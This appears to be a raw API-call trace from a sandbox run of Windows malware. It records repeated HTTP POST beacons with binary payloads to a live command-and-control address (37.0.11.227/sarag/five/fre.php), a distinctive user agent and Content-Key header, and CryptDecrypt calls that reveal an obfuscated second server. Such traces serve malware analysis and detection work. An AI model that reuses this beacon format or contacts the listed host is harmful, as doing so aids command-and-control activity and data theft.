[0311.445] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0311.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.446] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0311.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.447] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0311.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.448] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0311.448] GetProcessHeap () returned 0x690000 [0311.448] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0311.448] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0311.448] GetProcessHeap () returned 0x690000 [0311.448] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0311.448] socket (af=2, type=1, protocol=6) returned 0xa7c [0311.448] connect (s=0xa7c, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0311.475] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0311.475] GetProcessHeap () returned 0x690000 [0311.475] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0311.475] GetProcessHeap () returned 0x690000 [0311.475] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0311.476] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0311.476] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0311.477] GetProcessHeap () returned 0x690000 [0311.477] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0311.477] GetProcessHeap () returned 0x690000 [0311.477] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0311.477] GetProcessHeap () returned 0x690000 [0311.477] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0311.477] GetProcessHeap () returned 0x690000 [0311.477] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0311.478] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0311.479] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0311.479] GetProcessHeap () returned 0x690000 [0311.479] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0311.479] GetProcessHeap () returned 0x690000 [0311.479] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0311.479] send (s=0xa7c, buf=0x6ad508*, len=242, flags=0) returned 242 [0311.480] send (s=0xa7c, buf=0x6aba40*, len=159, flags=0) returned 159 [0311.480] GetProcessHeap () returned 0x690000 [0311.480] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0311.480] recv (in: s=0xa7c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0311.561] GetProcessHeap () returned 0x690000 [0311.561] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0311.561] GetProcessHeap () returned 0x690000 [0311.562] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0311.562] GetProcessHeap () returned 0x690000 [0311.562] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0311.563] GetProcessHeap () returned 0x690000 [0311.563] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0311.563] closesocket (s=0xa7c) returned 0 [0311.563] GetProcessHeap () returned 0x690000 [0311.563] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0311.564] GetProcessHeap () returned 0x690000 [0311.564] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0311.564] GetProcessHeap () returned 0x690000 [0311.564] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0311.565] GetProcessHeap () returned 0x690000 [0311.565] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0311.565] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1698) returned 0xa7c [0311.566] Sleep (dwMilliseconds=0xea60) [0311.568] GetProcessHeap () returned 0x690000 [0311.568] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0311.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.569] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.573] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0311.577] GetProcessHeap () returned 0x690000 [0311.577] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0311.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.578] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0311.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.579] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.580] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.580] GetProcessHeap () returned 0x690000 [0311.581] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0311.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.589] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0311.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.590] CryptDestroyKey (hKey=0x69d628) returned 1 [0311.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.591] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0311.591] GetProcessHeap () returned 0x690000 [0311.591] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0311.591] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.592] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0311.592] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.592] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0311.593] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.593] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0311.594] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.594] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0311.594] GetProcessHeap () returned 0x690000 [0311.594] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0311.594] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0311.594] GetProcessHeap () returned 0x690000 [0311.595] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0311.595] GetProcessHeap () returned 0x690000 [0311.595] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0311.595] GetProcessHeap () returned 0x690000 [0311.596] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0311.596] GetProcessHeap () returned 0x690000 [0311.596] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0311.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.597] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.601] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.601] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0311.606] GetProcessHeap () returned 0x690000 [0311.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0311.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.606] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0311.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.607] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.608] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.608] GetProcessHeap () returned 0x690000 [0311.608] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0311.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.609] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0311.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.610] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0311.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.611] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0311.611] GetProcessHeap () returned 0x690000 [0311.611] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0311.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.612] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0311.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.613] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0311.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.613] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0311.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.614] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0311.614] GetProcessHeap () returned 0x690000 [0311.614] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0311.614] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0311.614] GetProcessHeap () returned 0x690000 [0311.614] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab470 [0311.614] socket (af=2, type=1, protocol=6) returned 0xa80 [0311.615] connect (s=0xa80, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0311.658] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0311.658] GetProcessHeap () returned 0x690000 [0311.658] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0311.658] GetProcessHeap () returned 0x690000 [0311.658] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0311.658] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0311.659] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0311.659] GetProcessHeap () returned 0x690000 [0311.659] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0311.659] GetProcessHeap () returned 0x690000 [0311.659] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0311.660] GetProcessHeap () returned 0x690000 [0311.660] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0311.660] GetProcessHeap () returned 0x690000 [0311.660] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0311.661] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0311.663] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0311.663] GetProcessHeap () returned 0x690000 [0311.663] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0311.663] GetProcessHeap () returned 0x690000 [0311.664] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0311.664] send (s=0xa80, buf=0x6ad508*, len=242, flags=0) returned 242 [0311.664] send (s=0xa80, buf=0x6aba40*, len=159, flags=0) returned 159 [0311.664] GetProcessHeap () returned 0x690000 [0311.664] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0311.664] recv (in: s=0xa80, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0311.781] GetProcessHeap () returned 0x690000 [0311.781] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0311.781] GetProcessHeap () returned 0x690000 [0311.782] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0311.782] GetProcessHeap () returned 0x690000 [0311.782] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0311.782] GetProcessHeap () returned 0x690000 [0311.783] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0311.783] closesocket (s=0xa80) returned 0 [0311.784] GetProcessHeap () returned 0x690000 [0311.784] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab470 | out: hHeap=0x690000) returned 1 [0311.784] GetProcessHeap () returned 0x690000 [0311.784] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0311.785] GetProcessHeap () returned 0x690000 [0311.785] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0311.785] GetProcessHeap () returned 0x690000 [0311.785] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0311.786] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x170c) returned 0xa80 [0311.788] Sleep (dwMilliseconds=0xea60) [0311.789] GetProcessHeap () returned 0x690000 [0311.789] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0311.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.790] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.797] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0311.803] GetProcessHeap () returned 0x690000 [0311.803] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0311.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.804] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0311.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.805] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.805] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.805] GetProcessHeap () returned 0x690000 [0311.806] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0311.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.807] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0311.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.808] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0311.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.809] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0311.809] GetProcessHeap () returned 0x690000 [0311.809] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0311.810] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.810] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0311.811] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.811] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0311.811] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.812] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0311.812] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.812] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0311.812] GetProcessHeap () returned 0x690000 [0311.812] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0311.813] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0311.813] GetProcessHeap () returned 0x690000 [0311.813] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0311.816] GetProcessHeap () returned 0x690000 [0311.817] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0311.817] GetProcessHeap () returned 0x690000 [0311.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0311.818] GetProcessHeap () returned 0x690000 [0311.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0311.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.818] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.822] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0311.827] GetProcessHeap () returned 0x690000 [0311.827] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0311.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.827] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0311.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.828] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.829] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.829] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.829] GetProcessHeap () returned 0x690000 [0311.829] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0311.830] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.830] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0311.831] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.831] CryptDestroyKey (hKey=0x69d028) returned 1 [0311.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.832] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0311.832] GetProcessHeap () returned 0x690000 [0311.832] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0311.833] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.833] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0311.833] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.834] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0311.834] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.834] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0311.835] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.835] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0311.835] GetProcessHeap () returned 0x690000 [0311.835] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0311.835] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0311.835] GetProcessHeap () returned 0x690000 [0311.835] RtlAllocateHeap 